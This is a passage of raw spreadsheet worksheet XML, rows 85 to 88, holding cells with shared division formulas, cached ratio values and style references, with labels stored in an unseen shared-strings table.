        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="CM85" s="501">
        <f t="shared" si="70"/>
        <v>3</v>
      </c>
      <c r="CN85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="CO85" s="501">
        <f t="shared" si="70"/>
        <v>1</v>
      </c>
      <c r="CP85" s="501">
        <f t="shared" si="70"/>
        <v>9</v>
      </c>
      <c r="CQ85" s="501">
        <f t="shared" si="70"/>
        <v>2</v>
      </c>
      <c r="CR85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="CS85" s="501">
        <f t="shared" si="70"/>
        <v>0.001913759322</v>
      </c>
      <c r="CT85" s="501">
        <f t="shared" si="70"/>
        <v>0.007984031936</v>
      </c>
      <c r="CU85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="CV85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="CW85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="CX85" s="501">
        <f t="shared" si="70"/>
        <v>2</v>
      </c>
      <c r="CY85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="CZ85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="DA85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="DB85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="DC85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="DD85" s="501">
        <f t="shared" si="70"/>
        <v>2.5</v>
      </c>
      <c r="DE85" s="501">
        <f t="shared" si="70"/>
        <v>2</v>
      </c>
      <c r="DF85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="DG85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="DH85" s="501">
        <f t="shared" si="70"/>
        <v>1</v>
      </c>
      <c r="DI85" s="501">
        <f t="shared" si="70"/>
        <v>1</v>
      </c>
      <c r="DJ85" s="502">
        <f t="shared" si="70"/>
        <v>1.090909091</v>
      </c>
      <c r="DK85" s="271"/>
      <c r="DO85" s="279"/>
      <c r="DP85" s="271"/>
      <c r="DQ85" s="271"/>
      <c r="DR85" s="271"/>
      <c r="DS85" s="271"/>
      <c r="DT85" s="271"/>
      <c r="DU85" s="271"/>
      <c r="DV85" s="271"/>
      <c r="DW85" s="271"/>
      <c r="DX85" s="271"/>
      <c r="DY85" s="271"/>
      <c r="DZ85" s="271"/>
      <c r="EA85" s="271"/>
      <c r="EB85" s="271"/>
      <c r="EC85" s="271"/>
      <c r="ED85" s="280"/>
      <c r="EG85" s="279"/>
      <c r="EH85" s="271"/>
      <c r="EI85" s="271"/>
      <c r="EJ85" s="271"/>
      <c r="EK85" s="271"/>
      <c r="EL85" s="271"/>
      <c r="EM85" s="271"/>
      <c r="EN85" s="271"/>
      <c r="EO85" s="271"/>
      <c r="EP85" s="271"/>
      <c r="EQ85" s="271"/>
      <c r="ER85" s="271"/>
      <c r="ES85" s="271"/>
      <c r="ET85" s="271"/>
      <c r="EU85" s="271"/>
      <c r="EV85" s="271"/>
      <c r="EW85" s="271"/>
      <c r="EX85" s="271"/>
      <c r="EY85" s="271"/>
      <c r="EZ85" s="271"/>
      <c r="FA85" s="280"/>
    </row>
    <row r="86">
      <c r="J86" s="277"/>
      <c r="K86" s="352" t="s">
        <v>2574</v>
      </c>
      <c r="L86" s="403" t="s">
        <v>2575</v>
      </c>
      <c r="M86" s="403" t="s">
        <v>2576</v>
      </c>
      <c r="N86" s="404" t="s">
        <v>2577</v>
      </c>
      <c r="O86" s="278"/>
      <c r="Q86" s="271"/>
      <c r="R86" s="352" t="s">
        <v>2553</v>
      </c>
      <c r="S86" s="501">
        <f t="shared" ref="S86:AF86" si="71">S38/S$29</f>
        <v>0.1389007243</v>
      </c>
      <c r="T86" s="501">
        <f t="shared" si="71"/>
        <v>0.1802618328</v>
      </c>
      <c r="U86" s="501">
        <f t="shared" si="71"/>
        <v>0.9435483871</v>
      </c>
      <c r="V86" s="501">
        <f t="shared" si="71"/>
        <v>1.083333333</v>
      </c>
      <c r="W86" s="501">
        <f t="shared" si="71"/>
        <v>0</v>
      </c>
      <c r="X86" s="501">
        <f t="shared" si="71"/>
        <v>2017.142857</v>
      </c>
      <c r="Y86" s="501">
        <f t="shared" si="71"/>
        <v>1.714285714</v>
      </c>
      <c r="Z86" s="501">
        <f t="shared" si="71"/>
        <v>2.680986664</v>
      </c>
      <c r="AA86" s="501">
        <f t="shared" si="71"/>
        <v>1.260273973</v>
      </c>
      <c r="AB86" s="501">
        <f t="shared" si="71"/>
        <v>3.421052632</v>
      </c>
      <c r="AC86" s="501">
        <f t="shared" si="71"/>
        <v>3.857142857</v>
      </c>
      <c r="AD86" s="501">
        <f t="shared" si="71"/>
        <v>0.002064539294</v>
      </c>
      <c r="AE86" s="501">
        <f t="shared" si="71"/>
        <v>1.5</v>
      </c>
      <c r="AF86" s="502">
        <f t="shared" si="71"/>
        <v>1.00174216</v>
      </c>
      <c r="AG86" s="271"/>
      <c r="AH86" s="352" t="s">
        <v>2553</v>
      </c>
      <c r="AI86" s="501">
        <f t="shared" ref="AI86:DJ86" si="72">IF(AI$29=0,"-",AI38/AI$29)</f>
        <v>0.1383205456</v>
      </c>
      <c r="AJ86" s="501">
        <f t="shared" si="72"/>
        <v>0</v>
      </c>
      <c r="AK86" s="501">
        <f t="shared" si="72"/>
        <v>3</v>
      </c>
      <c r="AL86" s="501">
        <f t="shared" si="72"/>
        <v>0</v>
      </c>
      <c r="AM86" s="501">
        <f t="shared" si="72"/>
        <v>0.1802618328</v>
      </c>
      <c r="AN86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="AO86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="AP86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="AQ86" s="501">
        <f t="shared" si="72"/>
        <v>0.9035087719</v>
      </c>
      <c r="AR86" s="501">
        <f t="shared" si="72"/>
        <v>0.5</v>
      </c>
      <c r="AS86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="AT86" s="501">
        <f t="shared" si="72"/>
        <v>1</v>
      </c>
      <c r="AU86" s="501">
        <f t="shared" si="72"/>
        <v>3.5</v>
      </c>
      <c r="AV86" s="501">
        <f t="shared" si="72"/>
        <v>1.333333333</v>
      </c>
      <c r="AW86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="AX86" s="501">
        <f t="shared" si="72"/>
        <v>1.333333333</v>
      </c>
      <c r="AY86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="AZ86" s="501">
        <f t="shared" si="72"/>
        <v>0.5</v>
      </c>
      <c r="BA86" s="501">
        <f t="shared" si="72"/>
        <v>0</v>
      </c>
      <c r="BB86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="BC86" s="501">
        <f t="shared" si="72"/>
        <v>4705.333333</v>
      </c>
      <c r="BD86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="BE86" s="501">
        <f t="shared" si="72"/>
        <v>1</v>
      </c>
      <c r="BF86" s="501">
        <f t="shared" si="72"/>
        <v>1.5</v>
      </c>
      <c r="BG86" s="501">
        <f t="shared" si="72"/>
        <v>0</v>
      </c>
      <c r="BH86" s="501">
        <f t="shared" si="72"/>
        <v>1</v>
      </c>
      <c r="BI86" s="501">
        <f t="shared" si="72"/>
        <v>0</v>
      </c>
      <c r="BJ86" s="501">
        <f t="shared" si="72"/>
        <v>1</v>
      </c>
      <c r="BK86" s="501">
        <f t="shared" si="72"/>
        <v>3</v>
      </c>
      <c r="BL86" s="501">
        <f t="shared" si="72"/>
        <v>1</v>
      </c>
      <c r="BM86" s="501">
        <f t="shared" si="72"/>
        <v>5.955953827</v>
      </c>
      <c r="BN86" s="501">
        <f t="shared" si="72"/>
        <v>0.6</v>
      </c>
      <c r="BO86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="BP86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="BQ86" s="501">
        <f t="shared" si="72"/>
        <v>1.1</v>
      </c>
      <c r="BR86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="BS86" s="501">
        <f t="shared" si="72"/>
        <v>2.5</v>
      </c>
      <c r="BT86" s="501">
        <f t="shared" si="72"/>
        <v>1</v>
      </c>
      <c r="BU86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="BV86" s="501">
        <f t="shared" si="72"/>
        <v>0</v>
      </c>
      <c r="BW86" s="501">
        <f t="shared" si="72"/>
        <v>4</v>
      </c>
      <c r="BX86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="BY86" s="501">
        <f t="shared" si="72"/>
        <v>15</v>
      </c>
      <c r="BZ86" s="501">
        <f t="shared" si="72"/>
        <v>1</v>
      </c>
      <c r="CA86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="CB86" s="501">
        <f t="shared" si="72"/>
        <v>1</v>
      </c>
      <c r="CC86" s="501">
        <f t="shared" si="72"/>
        <v>0</v>
      </c>
      <c r="CD86" s="501">
        <f t="shared" si="72"/>
        <v>0</v>
      </c>
      <c r="CE86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="CF86" s="501">
        <f t="shared" si="72"/>
        <v>2</v>
      </c>
      <c r="CG86" s="501">
        <f t="shared" si="72"/>
        <v>0</v>
      </c>
      <c r="CH86" s="501">
        <f t="shared" si="72"/>
        <v>2</v>
      </c>
      <c r="CI86" s="501">
        <f t="shared" si="72"/>
        <v>22</v>
      </c>
      <c r="CJ86" s="501">
        <f t="shared" si="72"/>
        <v>0</v>
      </c>
      <c r="CK86" s="501">
        <f t="shared" si="72"/>
        <v>6</v>
      </c>
      <c r="CL86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="CM86" s="501">
        <f t="shared" si="72"/>
        <v>4.6</v>
      </c>
      <c r="CN86" s="501">
        <f t="shared" si="72"/>
        <v>0</v>
      </c>
      <c r="CO86" s="501">
        <f t="shared" si="72"/>
        <v>1.666666667</v>
      </c>
      <c r="CP86" s="501">
        <f t="shared" si="72"/>
        <v>10</v>
      </c>
      <c r="CQ86" s="501">
        <f t="shared" si="72"/>
        <v>2</v>
      </c>
      <c r="CR86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="CS86" s="501">
        <f t="shared" si="72"/>
        <v>0.001928947888</v>
      </c>
      <c r="CT86" s="501">
        <f t="shared" si="72"/>
        <v>0.007984031936</v>
      </c>
      <c r="CU86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="CV86" s="501">
        <f t="shared" si="72"/>
        <v>1</v>
      </c>
      <c r="CW86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="CX86" s="501">
        <f t="shared" si="72"/>
        <v>2</v>
      </c>
      <c r="CY86" s="501">
        <f t="shared" si="72"/>
        <v>0</v>
      </c>
      <c r="CZ86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="DA86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="DB86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="DC86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="DD86" s="501">
        <f t="shared" si="72"/>
        <v>3.5</v>
      </c>
      <c r="DE86" s="501">
        <f t="shared" si="72"/>
        <v>2</v>
      </c>
      <c r="DF86" s="501">
        <f t="shared" si="72"/>
        <v>0</v>
      </c>
      <c r="DG86" s="501" t="str">
        <f t="shared" si="72"/>
        <v>-</v>
      </c>
      <c r="DH86" s="501">
        <f t="shared" si="72"/>
        <v>1</v>
      </c>
      <c r="DI86" s="501">
        <f t="shared" si="72"/>
        <v>1</v>
      </c>
      <c r="DJ86" s="502">
        <f t="shared" si="72"/>
        <v>1.181818182</v>
      </c>
      <c r="DK86" s="271"/>
      <c r="DO86" s="279"/>
      <c r="DP86" s="271"/>
      <c r="DQ86" s="271"/>
      <c r="DR86" s="271"/>
      <c r="DS86" s="271"/>
      <c r="DT86" s="271"/>
      <c r="DU86" s="271"/>
      <c r="DV86" s="271"/>
      <c r="DW86" s="271"/>
      <c r="DX86" s="271"/>
      <c r="DY86" s="271"/>
      <c r="DZ86" s="271"/>
      <c r="EA86" s="271"/>
      <c r="EB86" s="271"/>
      <c r="EC86" s="271"/>
      <c r="ED86" s="280"/>
      <c r="EG86" s="279"/>
      <c r="EH86" s="271"/>
      <c r="EI86" s="271"/>
      <c r="EJ86" s="271"/>
      <c r="EK86" s="271"/>
      <c r="EL86" s="271"/>
      <c r="EM86" s="271"/>
      <c r="EN86" s="271"/>
      <c r="EO86" s="271"/>
      <c r="EP86" s="271"/>
      <c r="EQ86" s="271"/>
      <c r="ER86" s="271"/>
      <c r="ES86" s="271"/>
      <c r="ET86" s="271"/>
      <c r="EU86" s="271"/>
      <c r="EV86" s="271"/>
      <c r="EW86" s="271"/>
      <c r="EX86" s="271"/>
      <c r="EY86" s="271"/>
      <c r="EZ86" s="271"/>
      <c r="FA86" s="280"/>
    </row>
    <row r="87">
      <c r="J87" s="277"/>
      <c r="K87" s="500">
        <f t="shared" ref="K87:N87" si="73">K52/$M$31</f>
        <v>0.009820533641</v>
      </c>
      <c r="L87" s="501">
        <f t="shared" si="73"/>
        <v>0.2151136851</v>
      </c>
      <c r="M87" s="501">
        <f t="shared" si="73"/>
        <v>0.2828019542</v>
      </c>
      <c r="N87" s="502">
        <f t="shared" si="73"/>
        <v>0.4796278925</v>
      </c>
      <c r="O87" s="278"/>
      <c r="Q87" s="271"/>
      <c r="R87" s="352" t="s">
        <v>2554</v>
      </c>
      <c r="S87" s="501">
        <f t="shared" ref="S87:AF87" si="74">S39/S$29</f>
        <v>0.7556455049</v>
      </c>
      <c r="T87" s="501">
        <f t="shared" si="74"/>
        <v>0.9998561358</v>
      </c>
      <c r="U87" s="501">
        <f t="shared" si="74"/>
        <v>1.120967742</v>
      </c>
      <c r="V87" s="501">
        <f t="shared" si="74"/>
        <v>1.75</v>
      </c>
      <c r="W87" s="501">
        <f t="shared" si="74"/>
        <v>2</v>
      </c>
      <c r="X87" s="501">
        <f t="shared" si="74"/>
        <v>2020.285714</v>
      </c>
      <c r="Y87" s="501">
        <f t="shared" si="74"/>
        <v>2.428571429</v>
      </c>
      <c r="Z87" s="501">
        <f t="shared" si="74"/>
        <v>16.50005901</v>
      </c>
      <c r="AA87" s="501">
        <f t="shared" si="74"/>
        <v>1.589041096</v>
      </c>
      <c r="AB87" s="501">
        <f t="shared" si="74"/>
        <v>7.578947368</v>
      </c>
      <c r="AC87" s="501">
        <f t="shared" si="74"/>
        <v>5.428571429</v>
      </c>
      <c r="AD87" s="501">
        <f t="shared" si="74"/>
        <v>0.002513352183</v>
      </c>
      <c r="AE87" s="501">
        <f t="shared" si="74"/>
        <v>5.333333333</v>
      </c>
      <c r="AF87" s="502">
        <f t="shared" si="74"/>
        <v>1.756097561</v>
      </c>
      <c r="AG87" s="271"/>
      <c r="AH87" s="352" t="s">
        <v>2554</v>
      </c>
      <c r="AI87" s="501">
        <f t="shared" ref="AI87:DJ87" si="75">IF(AI$29=0,"-",AI39/AI$29)</f>
        <v>0.754369139</v>
      </c>
      <c r="AJ87" s="501">
        <f t="shared" si="75"/>
        <v>1</v>
      </c>
      <c r="AK87" s="501">
        <f t="shared" si="75"/>
        <v>6.5</v>
      </c>
      <c r="AL87" s="501">
        <f t="shared" si="75"/>
        <v>1</v>
      </c>
      <c r="AM87" s="501">
        <f t="shared" si="75"/>
        <v>0.9998561358</v>
      </c>
      <c r="AN87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="AO87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="AP87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="AQ87" s="501">
        <f t="shared" si="75"/>
        <v>0.9473684211</v>
      </c>
      <c r="AR87" s="501">
        <f t="shared" si="75"/>
        <v>0.75</v>
      </c>
      <c r="AS87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="AT87" s="501">
        <f t="shared" si="75"/>
        <v>2</v>
      </c>
      <c r="AU87" s="501">
        <f t="shared" si="75"/>
        <v>10.5</v>
      </c>
      <c r="AV87" s="501">
        <f t="shared" si="75"/>
        <v>1.666666667</v>
      </c>
      <c r="AW87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="AX87" s="501">
        <f t="shared" si="75"/>
        <v>1.555555556</v>
      </c>
      <c r="AY87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="AZ87" s="501">
        <f t="shared" si="75"/>
        <v>2.5</v>
      </c>
      <c r="BA87" s="501">
        <f t="shared" si="75"/>
        <v>2</v>
      </c>
      <c r="BB87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="BC87" s="501">
        <f t="shared" si="75"/>
        <v>4711.333333</v>
      </c>
      <c r="BD87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="BE87" s="501">
        <f t="shared" si="75"/>
        <v>3</v>
      </c>
      <c r="BF87" s="501">
        <f t="shared" si="75"/>
        <v>2</v>
      </c>
      <c r="BG87" s="501">
        <f t="shared" si="75"/>
        <v>1</v>
      </c>
      <c r="BH87" s="501">
        <f t="shared" si="75"/>
        <v>1</v>
      </c>
      <c r="BI87" s="501">
        <f t="shared" si="75"/>
        <v>1</v>
      </c>
      <c r="BJ87" s="501">
        <f t="shared" si="75"/>
        <v>3</v>
      </c>
      <c r="BK87" s="501">
        <f t="shared" si="75"/>
        <v>3</v>
      </c>
      <c r="BL87" s="501">
        <f t="shared" si="75"/>
        <v>2</v>
      </c>
      <c r="BM87" s="501">
        <f t="shared" si="75"/>
        <v>5.967496962</v>
      </c>
      <c r="BN87" s="501">
        <f t="shared" si="75"/>
        <v>23.1965251</v>
      </c>
      <c r="BO87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="BP87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="BQ87" s="501">
        <f t="shared" si="75"/>
        <v>1.3</v>
      </c>
      <c r="BR87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="BS87" s="501">
        <f t="shared" si="75"/>
        <v>3</v>
      </c>
      <c r="BT87" s="501">
        <f t="shared" si="75"/>
        <v>2</v>
      </c>
      <c r="BU87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="BV87" s="501">
        <f t="shared" si="75"/>
        <v>1</v>
      </c>
      <c r="BW87" s="501">
        <f t="shared" si="75"/>
        <v>5</v>
      </c>
      <c r="BX87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="BY87" s="501">
        <f t="shared" si="75"/>
        <v>26.5</v>
      </c>
      <c r="BZ87" s="501">
        <f t="shared" si="75"/>
        <v>1.016260163</v>
      </c>
      <c r="CA87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="CB87" s="501">
        <f t="shared" si="75"/>
        <v>2</v>
      </c>
      <c r="CC87" s="501">
        <f t="shared" si="75"/>
        <v>1</v>
      </c>
      <c r="CD87" s="501">
        <f t="shared" si="75"/>
        <v>1</v>
      </c>
      <c r="CE87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="CF87" s="501">
        <f t="shared" si="75"/>
        <v>2</v>
      </c>
      <c r="CG87" s="501">
        <f t="shared" si="75"/>
        <v>1</v>
      </c>
      <c r="CH87" s="501">
        <f t="shared" si="75"/>
        <v>9</v>
      </c>
      <c r="CI87" s="501">
        <f t="shared" si="75"/>
        <v>23</v>
      </c>
      <c r="CJ87" s="501">
        <f t="shared" si="75"/>
        <v>2</v>
      </c>
      <c r="CK87" s="501">
        <f t="shared" si="75"/>
        <v>7</v>
      </c>
      <c r="CL87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="CM87" s="501">
        <f t="shared" si="75"/>
        <v>17.6</v>
      </c>
      <c r="CN87" s="501">
        <f t="shared" si="75"/>
        <v>1</v>
      </c>
      <c r="CO87" s="501">
        <f t="shared" si="75"/>
        <v>2</v>
      </c>
      <c r="CP87" s="501">
        <f t="shared" si="75"/>
        <v>13.5</v>
      </c>
      <c r="CQ87" s="501">
        <f t="shared" si="75"/>
        <v>4</v>
      </c>
      <c r="CR87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="CS87" s="501">
        <f t="shared" si="75"/>
        <v>0.002263096341</v>
      </c>
      <c r="CT87" s="501">
        <f t="shared" si="75"/>
        <v>0.00998003992</v>
      </c>
      <c r="CU87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="CV87" s="501">
        <f t="shared" si="75"/>
        <v>7</v>
      </c>
      <c r="CW87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="CX87" s="501">
        <f t="shared" si="75"/>
        <v>2</v>
      </c>
      <c r="CY87" s="501">
        <f t="shared" si="75"/>
        <v>2</v>
      </c>
      <c r="CZ87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="DA87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="DB87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="DC87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="DD87" s="501">
        <f t="shared" si="75"/>
        <v>8.5</v>
      </c>
      <c r="DE87" s="501">
        <f t="shared" si="75"/>
        <v>2</v>
      </c>
      <c r="DF87" s="501">
        <f t="shared" si="75"/>
        <v>9</v>
      </c>
      <c r="DG87" s="501" t="str">
        <f t="shared" si="75"/>
        <v>-</v>
      </c>
      <c r="DH87" s="501">
        <f t="shared" si="75"/>
        <v>1.951111111</v>
      </c>
      <c r="DI87" s="501">
        <f t="shared" si="75"/>
        <v>1</v>
      </c>
      <c r="DJ87" s="502">
        <f t="shared" si="75"/>
        <v>1.454545455</v>
      </c>
      <c r="DK87" s="271"/>
      <c r="DO87" s="279"/>
      <c r="DP87" s="271"/>
      <c r="DQ87" s="271"/>
      <c r="DR87" s="271"/>
      <c r="DS87" s="271"/>
      <c r="DT87" s="271"/>
      <c r="DU87" s="271"/>
      <c r="DV87" s="271"/>
      <c r="DW87" s="271"/>
      <c r="DX87" s="271"/>
      <c r="DY87" s="271"/>
      <c r="DZ87" s="271"/>
      <c r="EA87" s="271"/>
      <c r="EB87" s="271"/>
      <c r="EC87" s="271"/>
      <c r="ED87" s="280"/>
      <c r="EG87" s="279"/>
      <c r="EH87" s="271"/>
      <c r="EI87" s="271"/>
      <c r="EJ87" s="271"/>
      <c r="EK87" s="271"/>
      <c r="EL87" s="271"/>
      <c r="EM87" s="271"/>
      <c r="EN87" s="271"/>
      <c r="EO87" s="271"/>
      <c r="EP87" s="271"/>
      <c r="EQ87" s="271"/>
      <c r="ER87" s="271"/>
      <c r="ES87" s="271"/>
      <c r="ET87" s="271"/>
      <c r="EU87" s="271"/>
      <c r="EV87" s="271"/>
      <c r="EW87" s="271"/>
      <c r="EX87" s="271"/>
      <c r="EY87" s="271"/>
      <c r="EZ87" s="271"/>
      <c r="FA87" s="280"/>
    </row>
    <row r="88">
      <c r="J88" s="277"/>
      <c r="K88" s="434"/>
      <c r="L88" s="353"/>
      <c r="M88" s="353"/>
      <c r="N88" s="354"/>
      <c r="O88" s="278"/>
      <c r="Q88" s="271"/>
      <c r="R88" s="386" t="s">
        <v>2555</v>
      </c>
      <c r="S88" s="501">
        <f t="shared" ref="S88:V88" si="76">IF(S$33=0,"-",S40/S$33)</f>
        <v>0.0004870920604</v>
      </c>
      <c r="T88" s="501" t="str">
        <f t="shared" si="76"/>
        <v>-</v>
      </c>
      <c r="U88" s="501">
        <f t="shared" si="76"/>
        <v>0.008064516129</v>
      </c>
      <c r="V88" s="501">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="W88" s="501">
        <f t="shared" ref="W88:W91" si="80">W40/W$29</f>
        <v>0</v>
      </c>
      <c r="X88" s="501">
        <f t="shared" ref="X88:AF88" si="77">IF(X$33=0,"-",X40/X$33)</f>
        <v>0</v>
      </c>
      <c r="Y88" s="501">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="Z88" s="501">
        <f t="shared" si="77"/>
        <v>0.06680042488</v>
      </c>
      <c r="AA88" s="501">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="AB88" s="501">
        <f t="shared" si="77"/>
        <v>0.05263157895</v>
      </c>
      <c r="AC88" s="501">
        <f t="shared" si="77"/>
        <v>0.1428571429</v>
      </c>
      <c r="AD88" s="501">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="AE88" s="501">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="AF88" s="502">
        <f t="shared" si="77"/>
        <v>0.03896103896</v>
      </c>
      <c r="AG88" s="271"/>
      <c r="AH88" s="386" t="s">
        <v>2555</v>
      </c>
      <c r="AI88" s="501">
        <f t="shared" ref="AI88:DJ88" si="78">IF(AI$29=0,"-",AI40/AI$29)</f>
        <v>0</v>
      </c>
      <c r="AJ88" s="501">
        <f t="shared" si="78"/>
        <v>1</v>
      </c>
      <c r="AK88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="AL88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="AM88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="AN88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="AO88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="AP88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="AQ88" s="501">
        <f t="shared" si="78"/>
        <v>0.008771929825</v>
      </c>
      <c r="AR88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="AS88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="AT88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="AU88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="AV88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="AW88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="AX88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="AY88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="AZ88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BA88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BB88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="BC88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BD88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="BE88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BF88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BG88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BH88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BI88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BJ88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BK88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BL88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BM88" s="501">
        <f t="shared" si="78"/>
        <v>0.1719319563</v>
      </c>
      <c r="BN88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BO88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="BP88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="BQ88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BR88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="BS88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BT88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BU88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="BV88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BW88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BX88" s="501" t="str">
        <f t="shared" si="78"/>
